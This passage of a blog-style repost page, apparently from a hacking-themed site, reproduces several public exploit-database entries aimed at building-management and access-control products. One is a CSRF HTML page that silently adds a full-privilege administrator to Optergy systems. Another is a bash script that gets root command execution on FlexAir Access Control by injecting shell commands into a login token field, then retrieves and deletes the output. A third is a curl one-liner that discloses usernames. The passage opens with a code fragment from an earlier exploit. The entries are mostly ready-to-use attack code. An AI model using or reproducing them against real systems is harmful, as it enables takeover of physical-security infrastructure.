re.search(r"BR>(.*?)</pre>", shell.text, flags = re.S) print regex.group(1).strip() except Exception: break sys.exit()
  23. HireHackking

    Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)

    HireHackking posted a blog entry in Hacker Technology
    # Title: Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin) # Author: LiquidWorm # Date: 2019-11-05 # Vendor: https://optergy.com/ # Product web page: https://optergy.com/products/ # Affected version: <=2.3.0a # Advisory: https://applied-risk.com/resources/ar-2019-008 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # CVE: CVE-2019-7273 # Optergy Proton/Enterprise BMS CSRF Add Admin <!-- CSRF Add Admin Exploit --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.232.19/controlPanel/ajax/UserManipulation.html?add" method="POST"> <input type="hidden" name="user.accountEnabled" value="true" /> <input type="hidden" name="user.username" value="testingus" /> <input type="hidden" name="user.password" value="testingus" /> <input type="hidden" name="confirmPassword" value="testingus" /> <input type="hidden" name="user.firstname" value="Tester" /> <input type="hidden" name="user.lastname" value="Testovski" /> <input type="hidden" name="user.companyName" value="TEST Inc." /> <input type="hidden" name="user.address" value="TestStr 17-251" /> <input type="hidden" name="user.emailAddress" value="aa@bb.cc" /> <input type="hidden" name="user.departmentId" value="" /> <input type="hidden" name="user.phoneNumber" value="1112223333" /> <input type="hidden" name="user.mobileNumber" value="1233211234" /> <input type="hidden" name="securityLevel" value="10" /> <input type="hidden" name="user.showBanner" value="true" /> <input type="hidden" name="user.showMenu" value="true" /> <input type="hidden" name="user.showAlarmTab" value="true" /> <input type="hidden" name="user.visibleAlarms" value="0" /> <input type="hidden" name="user.showBookmarks" value="true" /> <input type="hidden" name="user.showNotificationTab" value="true" /> <input type="hidden" name="user.autoDismissFeedback" value="true" /> <input type="hidden" name="user.canChangeBookmarks" value="true" /> <input type="hidden" name="user.canChangePassword" value="true" /> <input type="hidden" name="user.canUpdateProfile" value="true" /> <input type="hidden" name="homepage-text" value="" /> <input type="hidden" name="user.homePageType" value="" /> <input type="hidden" name="user.homePage" value="" /> <input type="hidden" name="background" value="" /> <input type="hidden" name="user.backgroundImage-text" value="" /> <input type="hidden" name="user.backgroundImage" value="" /> <input type="hidden" name="user.backgroundTiled" value="" /> <input type="hidden" name="user.backgroundColour" value="" /> <input type="hidden" name="newMemberships" value="1" /> <input type="hidden" name="user.id" value="" /> <input type="hidden" name="_sourcePage" value="/WEB-INF/jsp/controlPanel/UserAdministration.jsp" /> <input type="hidden" name="__fp" value="user.showBookmarks||user.showNotificationTab||user.emailSystemNotifications||user.addToSiteDirectory||user.showMenu||user.departmentId||user.showAlarmTab||user.smsAlarms||user.showBanner||accountExpires||user.autoDismissFeedback||user.changePasswordOnNextLogin||passwordExpires||user.showUserProfile||user.canUpdateProfile||user.canChangePassword||user.canChangeBookmarks||user.accountEnabled||" /> <input type="hidden" name="newPrivileges" value="7" /> <input type="hidden" name="newPrivileges" value="9" /> <input type="hidden" name="newPrivileges" value="8" /> <input type="hidden" name="newPrivileges" value="10" /> <input type="hidden" name="newPrivileges" value="13" /> <input type="hidden" name="newPrivileges" value="14" /> <input type="hidden" name="newPrivileges" value="12" /> <input type="hidden" name="newPrivileges" value="2" /> <input type="hidden" name="newPrivileges" value="3" /> <input type="hidden" name="newPrivileges" value="4" /> <input type="hidden" name="newPrivileges" value="139" /> <input type="hidden" name="newPrivileges" value="138" /> <input type="hidden" name="newPrivileges" value="141" /> <input type="hidden" name="newPrivileges" value="140" /> <input type="hidden" name="newPrivileges" value="124" /> <input type="hidden" name="newPrivileges" value="128" /> <input type="hidden" name="newPrivileges" value="119" /> <input type="hidden" name="newPrivileges" value="19" /> <input type="hidden" name="newPrivileges" value="17" /> <input type="hidden" name="newPrivileges" value="18" /> <input type="hidden" name="newPrivileges" value="20" /> <input type="hidden" name="newPrivileges" value="21" /> <input type="hidden" name="newPrivileges" value="24" /> <input type="hidden" name="newPrivileges" value="23" /> <input type="hidden" name="newPrivileges" value="132" /> <input type="hidden" name="newPrivileges" value="131" /> <input type="hidden" name="newPrivileges" value="134" /> <input type="hidden" name="newPrivileges" value="147" /> <input type="hidden" name="newPrivileges" value="25" /> <input type="hidden" name="newPrivileges" value="135" /> <input type="hidden" name="newPrivileges" value="105" /> <input type="hidden" name="newPrivileges" value="59" /> <input type="hidden" name="newPrivileges" value="142" /> <input type="hidden" name="newPrivileges" value="28" /> <input type="hidden" name="newPrivileges" value="27" /> <input type="hidden" name="newPrivileges" value="102" /> <input type="hidden" name="newPrivileges" value="31" /> <input type="hidden" name="newPrivileges" value="125" /> <input type="hidden" name="newPrivileges" value="30" /> <input type="hidden" name="newPrivileges" value="108" /> <input type="hidden" name="newPrivileges" value="129" /> <input type="hidden" name="newPrivileges" value="33" /> <input type="hidden" name="newPrivileges" value="34" /> <input type="hidden" name="newPrivileges" value="36" /> <input type="hidden" name="newPrivileges" value="37" /> <input type="hidden" name="newPrivileges" value="38" /> <input type="hidden" name="newPrivileges" value="46" /> <input type="hidden" name="newPrivileges" value="127" /> <input type="hidden" name="newPrivileges" value="41" /> <input type="hidden" name="newPrivileges" value="42" /> <input type="hidden" name="newPrivileges" value="45" /> <input type="hidden" name="newPrivileges" value="44" /> <input type="hidden" name="newPrivileges" value="49" /> <input type="hidden" name="newPrivileges" value="48" /> <input type="hidden" name="newPrivileges" value="112" /> <input type="hidden" name="newPrivileges" value="113" /> <input type="hidden" name="newPrivileges" value="117" /> <input type="hidden" name="newPrivileges" value="115" /> <input type="hidden" name="newPrivileges" value="116" /> <input type="hidden" name="newPrivileges" value="133" /> <input type="hidden" name="newPrivileges" value="51" /> <input type="hidden" name="newPrivileges" value="54" /> <input type="hidden" name="newPrivileges" value="56" /> <input type="hidden" name="newPrivileges" value="55" /> <input type="hidden" name="newPrivileges" value="66" /> <input type="hidden" name="newPrivileges" value="67" /> <input type="hidden" name="newPrivileges" value="60" /> <input type="hidden" name="newPrivileges" value="61" /> <input type="hidden" name="newPrivileges" value="62" /> <input type="hidden" name="newPrivileges" value="68" /> <input type="hidden" name="newPrivileges" value="69" /> <input type="hidden" name="newPrivileges" value="103" /> <input type="hidden" name="newPrivileges" value="104" /> <input type="hidden" name="newPrivileges" value="64" /> <input type="hidden" name="newPrivileges" value="65" /> <input type="hidden" name="newPrivileges" value="71" /> <input type="hidden" name="newPrivileges" value="121" /> <input type="hidden" name="newPrivileges" value="122" /> <input type="hidden" name="newPrivileges" value="85" /> <input type="hidden" name="newPrivileges" value="86" /> <input type="hidden" name="newPrivileges" value="74" /> <input type="hidden" name="newPrivileges" value="76" /> <input type="hidden" name="newPrivileges" value="144" /> <input type="hidden" name="newPrivileges" value="75" /> <input type="hidden" name="newPrivileges" value="77" /> <input type="hidden" name="newPrivileges" value="78" /> <input type="hidden" name="newPrivileges" value="79" /> <input type="hidden" name="newPrivileges" value="73" /> <input type="hidden" name="newPrivileges" value="143" /> <input type="hidden" name="newPrivileges" value="109" /> <input type="hidden" name="newPrivileges" value="110" /> <input type="hidden" name="newPrivileges" value="88" /> <input type="hidden" name="newPrivileges" value="89" /> <input type="hidden" name="newPrivileges" value="90" /> <input type="hidden" name="newPrivileges" value="118" /> <input type="hidden" name="newPrivileges" value="95" /> <input type="hidden" name="newPrivileges" value="93" /> <input type="hidden" name="newPrivileges" value="96" /> <input type="hidden" name="newPrivileges" value="94" /> <input type="hidden" name="newPrivileges" value="92" /> <input type="hidden" name="newPrivileges" value="98" /> <input type="hidden" name="newPrivileges" value="99" /> <input type="hidden" name="newPrivileges" value="146" /> <input type="hidden" name="newPrivileges" value="100" /> <input type="submit" value="Forgery" /> </form> </body> </html>
  24. HireHackking

    FlexAir Access Control 2.4.9api3 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 2.4.9api3 # Tested on: NA # CVE : CVE-2019-9189 # Advisory: https://applied-risk.com/resources/ar-2019-007 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # PoC #!/bin/bash # # Command injection with root privileges in FlexAir Access Control (Prima Systems) # Firmware version: <= 2.3.38 # # Discovered by Sipke Mellema # Updated: 14.01.2019 # ########################################################################## # # $ ./Nova2.3.38_cmd.sh 192.168.13.37 "id" # Executing: id # Output: # uid=0(root) gid=0(root) groups=0(root),10(wheel) # Removing temporary file.. # Done # ########################################################################## # Output file on the server OUTPUT_FILE="/www/pages/app/images/logos/output.txt" # Command to execute CMD="$2" # IP address IP="$1" # Change HTTP to HTTPS if required HOST="http://${IP}" # Add output file CMD_FULL="${CMD}>${OUTPUT_FILE}" # Command injection payload. Be careful with single quotes! PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;${CMD_FULL}'/></request></requests>" # Perform exploit echo "Executing: ${CMD}" curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx" # Get output echo "Output:" curl -s "${HOST}/app/images/logos/output.txt" # Remove temp file echo "Removing temporary file.." PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;rm /www/pages/app/images/logos/output.txt'/></request></requests>" curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx" echo "Done"
  25. HireHackking

    Optergy 2.3.0a - Username Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Title: Optergy 2.3.0a - Username Disclosure # Author: LiquidWorm # Date: 2019-11-05 # Vendor: https://optergy.com/ # Product web page: https://optergy.com/products/ # Affected version: <=2.3.0a # Advisory: https://applied-risk.com/resources/ar-2019-008 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # CVE: CVE-2019-7272 # PoC: curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value=' <option value="80">djuro</option> <option value="99">teppi</option> <option value="67">view</option> <option value="3">alerton</option> <option value="59">stef</option> <option value="41">humba</option> <option value="25">drmio</option> <option value="11">de3</option> <option value="56">andri</option> <option value="6">myko</option> <option value="22">dzonka</option> <option value="76">kosto</option> <option value="8">beebee</option> <option value="1">Administrator</option>